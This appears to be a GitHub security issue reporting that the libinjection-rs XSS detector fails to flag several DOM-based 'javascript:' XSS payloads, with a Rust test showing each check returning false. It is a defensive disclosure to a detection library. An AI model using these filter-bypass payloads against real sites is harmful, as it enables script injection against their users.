Skip to content

[SECURITY] Possible DOM Base XSS  #2

Description

@raminfp

Hi,

Methods for bypass libinjection-rs of DOM base XSS

1- javascript:alert(eval("2*3"));

Senario

PoC : http://example.com/?returnURL=javascript:alert(1);

          var redirectUrl = getUrlParameter('returnURL');
          window.parent.location.href = redirectUrl;

2- a tag when user click button and trigger alert :).

	 <a href="javascript:alert(1);"> click me </a>

3- title value

     `<img id="testz" title="javascript:alert(1)">`
        <script>
         document.location.href=window.testz.title;
        </script>

Real example :

DOM XSS

source image : https://twitter.com/Milad_Bahari/status/990539191544156160

Source

[dependencies]
json = "0.11.13"
libinjection = "0.1"
#[macro_use]
extern crate json;
extern crate libinjection;

use libinjection::{xss};


fn main() {
    let data = object!{
        "foo" => "javascript:alert(1);",
    };

    let is_xss = xss("javascript:alert(1);").unwrap();
    let is_xss_2 = xss(&data.dump()).unwrap();
    let is_xss_3 = xss("<img id='testz' title='javascript:alert(1)'>").unwrap();
    
    println!("{}", data); 
    println!("{}", is_xss); // false
    println!("{}", is_xss_2); // false
    println!("{}", is_xss_3); // false

}

Thanks,
Ramin - kernel security engineering
Best regards,

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions